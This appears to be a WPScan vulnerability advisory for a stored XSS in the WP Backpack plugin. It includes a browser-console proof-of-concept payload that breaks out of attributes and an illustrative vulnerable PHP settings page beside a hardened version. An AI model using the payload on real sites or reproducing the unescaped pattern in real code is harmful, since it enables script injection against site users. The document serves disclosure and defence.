wpvulndb | Bob Matyas | WPVDB-ID:CE4688B6-6713-43B5-AA63-8A3B036BD332
History: May 17, 2024 - 12:00 a.m.

WP Backpack <= 2.1 - Admin+ Stored XSS

Source: wpscan.com
Tags: wordpress, stored xss, plugin vulnerability, unsanitized settings, admin privileges, cross-site scripting

AI Score: 4.9
Confidence: High

Description

The plugin does not sanitise and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup).

PoC

1. Go to https://example.com/wp-admin/admin.php?page=optik
2. In the browser console, run the code:

    let inputs = document.querySelectorAll( '#wpbody-content input[type="text"]' );
    inputs.forEach( (element) => element.value=`" style=animation-name:rotation onanimationstart=alert(/XSS: ${element.name}/)//` );
    let textareas = document.querySelectorAll( '#wpbody-content textarea' );
    textareas.forEach( (element) => element.value=`` );

3. Save the settings
4. Reload the page and see multiple XSS alerts
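The bug class in this advisory is a settings page that stores what an admin submits verbatim and then echoes it straight back into an HTML attribute. The following is an added illustration, not code from the WP Backpack plugin or from WPScan: a minimal WordPress settings page showing the vulnerable pattern next to the hardened one. The option names (`example_title`, `example_description`), the settings group and the function names are hypothetical; the WordPress API calls (`register_setting`, `sanitize_text_field`, `wp_kses_post`, `esc_attr`, `esc_textarea`) are real.

```php
<?php
// Added illustration (hypothetical plugin, not WP Backpack's own code).
// Option names, settings group and function names are made up for the example.

/* ---------- Vulnerable pattern ---------- */

// No sanitize_callback: whatever the admin submits is stored verbatim.
// The plugin never passes the value through wp_kses, so the unfiltered_html
// capability (normally removed in multisite) is never consulted at all.
function example_register_unsafe() {
    register_setting( 'example_group', 'example_title' );
}

// Raw echo into an attribute. A stored value such as
//   " style=animation-name:rotation onanimationstart=alert(1)//
// closes the value="" attribute and injects new attributes, which is exactly
// what the PoC above relies on.
function example_field_unsafe() {
    $value = get_option( 'example_title', '' );
    echo '<input type="text" name="example_title" value="' . $value . '">';
}

/* ---------- Hardened pattern ---------- */

// 1) Sanitise on save. register_setting() accepts a sanitize_callback in $args;
//    sanitize_text_field() strips tags and stray octets for plain-text fields,
//    wp_kses_post() keeps only allowed HTML where rich content is intended.
//    Note: sanitize_text_field() does NOT remove double quotes, so sanitising
//    alone would still let the PoC payload break out of an attribute. Output
//    escaping (step 2) is what actually neutralises it.
function example_register_safe() {
    register_setting(
        'example_group',
        'example_title',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'sanitize_text_field',
        )
    );
    register_setting(
        'example_group',
        'example_description',
        array(
            'type'              => 'string',
            'sanitize_callback' => 'wp_kses_post',
        )
    );
}

// 2) Escape on output, picking the escaper for the context:
//    esc_attr() inside an attribute (turns " into &quot;),
//    esc_textarea() inside a <textarea> element.
function example_field_safe() {
    $title = get_option( 'example_title', '' );
    $desc  = get_option( 'example_description', '' );
    echo '<input type="text" name="example_title" value="' . esc_attr( $title ) . '">';
    echo '<textarea name="example_description">' . esc_textarea( $desc ) . '</textarea>';
}

add_action( 'admin_init', 'example_register_safe' );
```

When reviewing a plugin for this issue, look at both halves independently: a missing `sanitize_callback` on `register_setting()` (or an `update_option()` fed directly from `$_POST`) and any `get_option()` result echoed without an `esc_*` call. Either half alone is a finding; the advisory's plugin had both, which is why an admin without `unfiltered_html` could still persist script.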

